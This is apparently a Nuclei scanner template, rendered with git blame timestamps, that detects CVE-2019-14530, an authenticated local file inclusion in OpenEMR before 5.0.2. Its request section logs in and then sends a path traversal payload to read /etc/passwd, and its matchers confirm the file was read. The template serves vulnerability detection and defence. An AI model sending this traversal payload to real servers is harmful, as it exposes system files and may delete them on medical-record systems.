2022-08-27 05:16:12 +00:00
id : CVE-2019-14530
2022-08-27 07:38:55 +00:00
2022-08-27 05:16:12 +00:00
info :
2023-01-16 17:41:15 +00:00
name : OpenEMR <5.0.2 - Local File Inclusion
2022-08-27 05:16:12 +00:00
author : TenBird
severity : high
2022-08-27 07:38:55 +00:00
description : |
2023-01-16 17:41:15 +00:00
OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server.
2022-08-27 05:16:12 +00:00
reference :
2022-08-27 07:38:55 +00:00
- https://www.exploit-db.com/exploits/50037
- https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip
2022-08-30 18:11:00 +00:00
- https://github.com/openemr/openemr/pull/2592
2023-01-16 17:41:15 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-14530
2022-08-27 05:16:12 +00:00
classification :
2022-08-30 18:11:00 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
2022-08-27 05:16:12 +00:00
cve-id : CVE-2019-14530
2022-08-30 18:11:00 +00:00
cwe-id : CWE-22
2022-08-30 05:53:22 +00:00
metadata :
2022-08-30 18:11:00 +00:00
verified : "true"
tags : lfi,authenticated,edb,cve,cve2019,openemr
2022-08-27 05:16:12 +00:00
requests :
- raw :
- |
POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-08-27 07:38:55 +00:00
2022-08-27 05:16:12 +00:00
new_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1
2022-08-27 07:38:55 +00:00
2022-08-27 05:16:12 +00:00
- |
GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1
Host : {{Hostname}}
2022-08-27 07:38:55 +00:00
2022-10-07 21:27:25 +00:00
host-redirects : true
2022-08-27 07:38:55 +00:00
max-redirects : 2
2022-08-27 05:16:12 +00:00
cookie-reuse : true
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
2022-08-27 07:38:55 +00:00
2022-08-27 15:41:32 +00:00
- type : word
part : header
words :
- filename=passwd
2022-08-27 07:38:55 +00:00
- type : status
status :
- 200
2023-01-16 17:41:15 +00:00
# Enhanced by mp on 2023/01/15